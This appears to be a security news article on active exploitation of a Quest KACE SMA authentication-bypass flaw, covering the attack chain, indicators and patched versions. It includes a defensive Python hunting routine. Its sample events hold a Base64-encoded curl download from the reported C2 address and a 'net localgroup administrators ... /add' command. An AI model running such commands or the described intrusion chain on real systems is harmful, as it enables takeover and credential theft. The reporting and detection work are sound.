The flaw, tracked as CVE-2025-32975, affects the appliance’s Single Sign-On (SSO) authentication mechanism and allows attackers to bypass authentication entirely.
This enables threat actors to impersonate legitimate users without needing valid login credentials, effectively granting full administrative control over vulnerable systems.
Quest KACE SMA is widely used by organizations for centralized endpoint management, including software deployment, patching, and device monitoring.
Its deep integration into enterprise environments makes it a high-value target for attackers.
Although a patch for the vulnerability was released in May 2025, many organizations have failed to update their systems.
As a result, unpatched and internet-exposed appliances are now being actively targeted in the wild. Researchers observed exploitation activity beginning the week of March 9, 2026.
Security researchers at Arctic Wolf discovered that once attackers gain initial access through the authentication bypass, they quickly establish persistence within the compromised environment.
They leverage the built-in KPluginRunProcess feature to execute remote commands, often using Base64-encoded payloads to evade detection.
In observed attacks, threat actors used simple curl commands to download additional malicious payloads from an external command-and-control server hosted at IP address 216.126.225.156.
This indicates a straightforward yet effective method of staging further compromise.
To maintain persistence, attackers abuse legitimate system processes such as runkbot.exe to create unauthorized administrative accounts.
These rogue accounts are then added to local and domain administrator groups, ensuring continued access even if the original entry point is detected.
The attackers also deploy stealthy PowerShell scripts, including files like Enable-UpdateServices.ps1 and taskband.ps1, which modify registry settings and establish long-term backdoor access.
These changes allow the malicious presence to survive system reboots and routine maintenance operations.
After securing persistence, the focus shifts to credential harvesting and internal reconnaissance. Attackers deploy Mimikatz, sometimes disguised as benign executables like asd.exe, to extract plaintext credentials directly from system memory.
Using these credentials, they map the network environment and identify high-value targets.
Researchers observed lateral movement via Remote Desktop Protocol (RDP), with attackers gaining access to critical infrastructure such as domain controllers and enterprise backup systems, including those running Veeam and Veritas software.
This level of access significantly increases the risk of widespread compromise, data theft, or even ransomware deployment.
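One way to hunt for the chain described above in endpoint process-creation telemetry, added here as an example that is not from the original article or from Arctic Wolf: a Python triage routine that decodes Base64-encoded PowerShell, checks both the raw and decoded command lines for the reported C2 address and script names, and flags runkbot.exe spawning account-creation commands. The event dictionary layout and the sample events are constructed assumptions, not real telemetry.

```python
import base64
import re
# Indicators named in the write-up above; the event format itself is constructed.
C2_IP = "216.126.225.156"
SUSPECT_SCRIPTS = ("enable-updateservices.ps1", "taskband.ps1")
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def encode_command(text):
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, Base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None

def triage_event(event):
    """Map one process-creation event (dict with parent/image/cmdline) to sorted alert names."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    texts = [event.get("cmdline", "")]          # raw command line, plus decoded payload if any
    alerts = set()
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(texts[0])
        if decoded is not None:
            alerts.add("encoded_powershell")
            texts.append(decoded)               # inspect what the Base64 actually hides
    for text in texts:
        if C2_IP in text:
            alerts.add("download_from_known_c2")
        if any(name in text.lower() for name in SUSPECT_SCRIPTS):
            alerts.add("known_persistence_script")
    # runkbot.exe (a legitimate KACE process per the write-up) spawning net.exe with /add
    if parent.endswith("runkbot.exe") and image in ("net.exe", "net1.exe") and "/add" in texts[0].lower():
        alerts.add("rogue_admin_account")
    return sorted(alerts)

# Constructed sample events modelled on the observed chain, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "runkbot.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -enc " + encode_command("curl http://216.126.225.156/a.ps1 -o taskband.ps1")},
    {"parent": "runkbot.exe", "image": "net.exe", "cmdline": "net localgroup administrators backup_svc /add"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe readme.txt"},
]
```

Feed real process-creation events (Sysmon event 1 or EDR equivalents) into `triage_event` after mapping their fields to the same three keys.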
Security experts strongly urge organizations to immediately patch affected systems. Users running older versions, including 13.0, 13.1, and 13.2, should upgrade to versions 13.0.385, 13.1.81, and 13.2.183 respectively, or later.
For newer deployments, version 14.0 requires Patch 5 (14.0.341), while version 14.1 requires Patch 4 (14.1.101).
In addition to patching, organizations should remove KACE SMA interfaces from public internet exposure.
Restricting access through VPNs or secure network boundaries can significantly reduce the attack surface and prevent unauthorized exploitation.
The ongoing campaign highlights the persistent risk posed by unpatched systems and the speed at which attackers weaponize known vulnerabilities to infiltrate enterprise environments.
The post Hackers Exploit Quest KACE SMA Flaw to Steal Credentials appeared first on Cyber Security News.